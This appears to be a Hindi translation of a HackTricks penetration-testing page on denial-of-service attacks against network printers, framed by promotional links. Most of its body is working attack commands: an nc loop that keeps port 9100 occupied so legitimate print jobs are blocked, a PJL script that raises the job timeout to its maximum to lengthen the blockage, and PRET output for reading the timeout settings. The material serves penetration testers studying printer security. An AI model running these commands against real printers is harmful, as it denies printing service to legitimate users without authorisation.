7.3 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? सदस्यता योजनाएं की जांच करें!
-
खोजें The PEASS Family, हमारा विशेष संग्रह NFTs
-
प्राप्त करें आधिकारिक PEASS & HackTricks swag
-
शामिल हों 💬 Discord समूह या टेलीग्राम समूह में या मुझे Twitter पर फ़ॉलो करें 🐦@carlospolopm.
-
अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके साझा करें.
यदि प्रिंट जॉब सीरीज में प्रोसेस होते हैं - जो अधिकांश उपकरणों के लिए माना जाता है - तो केवल एक जॉब एक समय में हैंडल किया जा सकता है। यदि यह जॉब प्रिंटिंग चैनल को समाप्त नहीं करता है, तो यह टाइमआउट ट्रिगर होने तक प्रिंटिंग चैनल को ब्लॉक कर देता है, जिससे वैध उपयोगकर्ताओं को प्रिंट करने से रोक दिया जाता है।
बेसिक डीओएस:
while true; do nc printer 9100; done
इस तत्काल सेवा अवरोधन हमले को PJL के साथ उच्च टाइमआउट मान सेट करके सुधारा जा सकता है, फिर हमलावर्ती उपयोगकर्ता के लिए कनेक्शन की संख्या कम होती है जबकि वास्तविक उपयोगकर्ताओं को एक मुफ्त समय स्लॉट प्राप्त करना और भी कठिन होता है:
# get maximum timeout value with PJL
MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
# connect and set maximum timeout for current job with PJL
while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done
आप PRET का उपयोग करके टाइमआउट सेटिंग्स को खोजने के लिए उपयोग कर सकते हैं:
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> env timeout
TIMEOUT=15 [2 RANGE]
5
300
जबकि PJL संदर्भ में 300 सेकंड का अधिकतम समय सीमित किया गया है, वास्तविकता में अधिकतम PJL समय सीमाएं 15 से 2147483 सेकंड तक हो सकती हैं।
ध्यान दें कि IPP या LPD जैसे अन्य प्रिंटिंग चैनल से प्राप्त प्रिंट जॉब्स तब तक प्रोसेस नहीं किए जाते हैं जब तक कनेक्शन खुली रहती है।
इस हमले के बारे में और अधिक जानें http://hacking-printers.net/wiki/index.php/Transmission_channel
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? SUBSCRIPTION PLANS की जांच करें!
-
खोजें The PEASS Family, हमारा विशेष NFTs संग्रह
-
प्राप्त करें आधिकारिक PEASS & HackTricks swag
-
शामिल हों 💬 Discord समूह या टेलीग्राम समूह में या मुझे Twitter 🐦@carlospolopm** का** अनुसरण करें।**
-
अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर सबमिट करके साझा करें।